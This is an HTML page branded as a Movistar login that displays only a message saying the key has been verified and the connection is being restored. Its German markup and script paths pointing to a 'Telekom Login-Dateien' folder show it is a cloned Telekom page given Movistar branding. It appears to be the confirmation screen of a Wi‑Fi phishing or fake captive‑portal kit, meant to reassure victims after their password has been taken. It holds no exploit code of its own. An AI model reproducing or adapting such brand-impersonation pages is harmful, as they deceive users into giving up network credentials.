<!DOCTYPE html>
<!--[if (lte IE 8) ]><html lang="de-DE" class="no-js lte-ie8"><![endif]--><!--[if (gt IE 8)|!(IE)]><!--><html class=no-js lang=de><!--<![endif]--><!-- HEAD --><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content=IE=edge><title>Movistar Login</title><meta name=viewport content="width=device-width, initial-scale=1"><link rel=stylesheet type=text/css href=styles/components.css><link rel=stylesheet type=text/css href=styles/login.css></head> <!-- /HEAD --> <!-- BODY --> <body> <!-- HEADER --> <div id=tbs-header> <div id=tbs-header-content> <div class="container-fixed clearfix"> <div class="tbs-text-zero pull-left"> <img id=logo src=img/logo_movistar.png alt> </div> </div> </div> </div> <!-- /HEADER --> <!-- CANCEL FORM --> <!-- /CANCEL FORM --> <!-- CONTENT --> <div id=tbs-container> <div class=text-center> <div id=tbs-infobox> <center><img id=happy src=img/happy.png alt></center> <center><p><i class="icon icon-large">V</i> Clave verificada, se está restaurando la conexi&oacute;n.</p></center> </div> </div> </div> <!-- /CONTENT --> <!-- FOOTER --> <div id=tbs-footer class=sticky> <div class=container-fixed> <div class="text-small clearfix"> <div class=pull-left> <p>&copy; 2017 Movistar Telecomunicaciones</p> </div> <div class="pull-right clearfix"> <div class=pull-left> <a class=offset-right-4 href=https://www.movistar.com/es/ target=_blank tabindex=90>Movistar</a> </div> </div> </div> </div> </div> <!-- /FOOTER --> <!-- Status --> <script>
            var accountLocked = false;
            var accountLockedPermanent = false;
            var accountLockExpiration = 0;
        </script> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]>
        <script type="text/javascript" src="/static/vdplus/js/html5shiv.js"></script>
        <script type="text/javascript" src="/static/vdplus/js/respond.min.js"></script>
        <![endif]--> <script type=text/javascript src=Telekom%20Login-Dateien/jquery-1.js></script> <script type=text/javascript src=Telekom%20Login-Dateien/components.js></script> <script type=text/javascript src=Telekom%20Login-Dateien/login.js></script> <!-- Tracking --> <!-- Callback Tracking --> <!-- Toon Template Debugging --> </body><!-- /BODY --></html> 